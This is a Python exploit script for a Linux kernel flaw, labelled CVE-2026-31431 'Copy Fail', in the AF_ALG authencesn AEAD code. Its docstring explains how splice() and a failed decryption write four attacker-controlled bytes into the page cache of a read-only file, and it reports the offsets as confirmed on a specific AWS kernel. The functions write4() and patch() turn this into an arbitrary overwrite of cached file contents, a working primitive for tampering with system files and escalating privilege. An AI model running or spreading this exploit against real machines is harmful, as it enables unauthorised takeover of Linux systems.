#!/usr/bin/env python3
"""
CVE-2026-31431 "Copy Fail" page-cache write primitive.

Linux kernel AF_ALG AEAD (crypto/algif_aead.c, _aead_recvmsg) chains
page-cache pages from the TX SGL into the decryption *destination* when the
authencesn template rearranges ESN bytes: it writes seqno_lo (AAD bytes 4..7,
attacker controlled) at dst[assoclen + cryptlen]. Via splice() that dst offset
lands inside a page-cache page of an attacker-readable file -> a controlled
4-byte write into the in-memory page (never marked dirty, never flushed to
disk; visible to every subsequent read()/exec of that page).

Confirmed layout on the target kernel (6.17.0-1009-aws): with assoclen=8 and a
single AES block of ciphertext (cryptlen=16) spliced from file offset
`src_off`, the 4 payload bytes land at file offset `src_off` in the page cache,
and recv() returns EBADMSG (the intentional HMAC failure) after the write.

write4(fd, offset, data4) -> arbitrary 4-byte page-cache write at `offset`.
"""
import os
import socket
import struct

AF_ALG = 38
SOL_ALG = 279
ALG_SET_KEY = 1
ALG_SET_IV = 2
ALG_SET_OP = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5

CRYPTO_AUTHENC_KEYA_PARAM = 1
ASSOCLEN = 8
CRYPTLEN = 16   # one AES-CBC block; write lands at src_off + (CRYPTLEN-16) = src_off
AUTHSIZE = 16


def _authenc_key(authkeylen=32, enckeylen=16):
    """RTA-encoded authenc key (all zeros; value is irrelevant, HMAC fails)."""
    rta = struct.pack("HH", 8, CRYPTO_AUTHENC_KEYA_PARAM) + struct.pack(">I", enckeylen)
    return rta + b"\x00" * authkeylen + b"\x00" * enckeylen


KEY = _authenc_key()


def _new_op_socket():
    tfm = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    tfm.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    tfm.setsockopt(SOL_ALG, ALG_SET_KEY, KEY)
    tfm.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, AUTHSIZE)
    op, _ = tfm.accept()
    return tfm, op


def write4(fd, offset, data4):
    """Write 4 bytes `data4` at byte `offset` into the page cache of open
    O_RDONLY `fd`. Requires the file to have >= offset+CRYPTLEN bytes."""
    assert len(data4) == 4
    tfm, op = _new_op_socket()
    try:
        # AAD = 4-byte SPI + 4-byte seqno_lo (the payload that gets written)
        aad = b"A" * 4 + data4
        op.sendmsg(
            [aad],
            [
                (SOL_ALG, ALG_SET_OP, b"\x00" * 4),               # decrypt
                (SOL_ALG, ALG_SET_IV, b"\x10" + b"\x00" * 19),    # ivlen=16 + IV
                (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, struct.pack("I", ASSOCLEN)),
            ],
            socket.MSG_MORE,
        )
        # Splice one AES block from file offset `offset` (page-cache pages) into
        # the AF_ALG op socket TX SGL.
        r, w = os.pipe()
        try:
            os.splice(fd, w, CRYPTLEN, offset_src=offset)
            os.splice(r, op.fileno(), CRYPTLEN)
        finally:
            os.close(r)
            os.close(w)
        # Trigger: authencesn writes seqno_lo into the chained page-cache page
        # at dst[assoclen + cryptlen]; HMAC fails (EBADMSG) -> the write is done.
        try:
            op.recv(ASSOCLEN + CRYPTLEN + AUTHSIZE)
        except OSError:
            pass
    finally:
        op.close()
        tfm.close()


def patch(path, offset, data):
    """Patch `data` into the page cache of `path` starting at `offset`,
    4 bytes per primitive iteration. `data` length must be a multiple of 4."""
    assert len(data) % 4 == 0
    fd = os.open(path, os.O_RDONLY)
    try:
        os.pread(fd, 4096, offset & ~0xFFF)   # warm page cache
        i = 0
        while i < len(data):
            write4(fd, offset + i, data[i:i + 4])
            i += 4
    finally:
        os.close(fd)
